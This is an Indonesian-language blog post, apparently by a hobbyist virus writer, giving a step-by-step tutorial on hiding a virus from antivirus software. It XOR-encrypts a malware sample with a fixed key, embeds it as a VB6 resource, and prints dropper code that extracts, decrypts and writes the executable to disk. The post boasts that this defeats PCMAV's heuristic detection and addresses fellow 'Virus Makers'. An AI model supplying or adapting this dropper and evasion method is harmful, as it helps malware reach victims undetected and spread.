Virus Tutorial : Drop file, Sembunyikan Virus anda

Virus Tutorial : Drop file, Sembunyikan Virus anda

Mungkin bagi para Virus Maker, sudah pernah mendengar tehnik Drop File, ato ada yang menyebut Host file, tapi intinya tetap sama. Drop file adalah suatu tehnik virus untuk mengekstrak suatu file dari file. biasanya drop File digunakan untuk mengekstrak file anak dari file induk..

Dalam artikel ini, kebiasaan itu akan saya balik. Bagaimana kalau kita mengekstrak file induk dari file anak?
mengapa musti begitu?

Tehnik ini mempunyai satu keunggulan, yaitu meloloskan diri dari tehnik heuristik yang sering dibanggakan oleh para AV Maker.. kita mengambil contoh PCMAV..

saya mempunyai satu sampel virus.. namanya help.exe

ketika akan saya scan dengan PCMAV, terlihat hasil seperti ini..

dan ketika saya mencoba memakai tehnik ini, alhasil, PCMAV gagal mendeteksi sampel virus tersebut..

Sebenarnya, gerangan apakah yang terjadi..
Sebenarnya langkah yang saya lakukan sebagai berikut:
1. mengenkripsi sampel virus
enkripsi saya gunakan dengan program ciptaan saya sendiri dengan memanfaatkan clsSimpleXOR. mau pake program saya(lih. bagian download) ato clsSimpleXOR, terserah, hasilnya masih sama toh.
2. memakai fasilitas resouce editor pada vb 6.0, dan memasukkan sampel virus yang telah terenkripsi ke resource editor
3. mengetik kode untuk mengekstrak file
4. Di compile deh programnya

sederhana bukan? atau nggak jelas? tenang , akan saya jelaskan langkah demi langkah.

[1]
pertama-tama enkripsi sampel virus yang mau dienkripsi (atau virus anda juga boleh) dengn metode enkripsi apa saja, tetapi sekali lagi di artikel ini saya menggunakan ClsSimpleXOR , dan untuk contoh saya menggunakan kunci “runion”

Mengapa harus terenkripsi? sebab bila tidak terenkripsi, file yang ada di dalam program kita masih dapat dibaca oleh AV dan dapat terdeteksi sebagai malicious code..

[2]
nyalakan fungsi resource editor pada vb. Caranya? pada menu bar vb, cari pilihan menu add-in, lalu pilih add-in manager.lalu pilih vb6.0 resource editor untuk di load

terus? kita nyalakan vb resource editor, pilih icon custom di bagian atas jendela vb resource editor, lalu pilih file sampel virus yang sudah terenkripsi,

[3]
tambahkan class module clsSimpleXOR, buat satu command button, lalu ketik kode berikut:

Private Sub Command1_Click()
Dim a() As Byte    
a = LoadResData(101, "CUSTOM")     
Open "C:/virux.exe" For Binary As #1     
Put #1, , a     
Close #1     
Dim chiper As New clsSimpleXOR     
chiper.DecryptFile "c:/virux.exe", "c:/virus.exe", "runion"     
Kill "C:/virux.exe" 
End Sub

path dan kunci enkripsi atau dekripsi pada kode bisa menyesuaikan, suka-suka anda yang jelas

[4]Compile deh programnya, namanya bisa apa aja.

sekarang coba discan pake PCMAV, pasti nggak terdeteksi.
dengan tehnik ini, setidaknya virus kita sudah menang satu langkah dari AV, betul nggak?
Semoga membantu:

download project dan program chiper di:
download program

thanx to:
Morphic -> Kembangin terus AVmu
Anharku -> artikel ini inspirasinya dari kamu, gak tahu caranya gimana bisa dapat gimana.
Mas Aat dengn clsSimpleXORnya yang aku gunakan dari SMP

Tentang boycreations

I am a boy who wont to make a many creations for share to everyone. Because i am a good boy...(^_^)
Pos ini dipublikasikan di virus. Tandai permalink.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s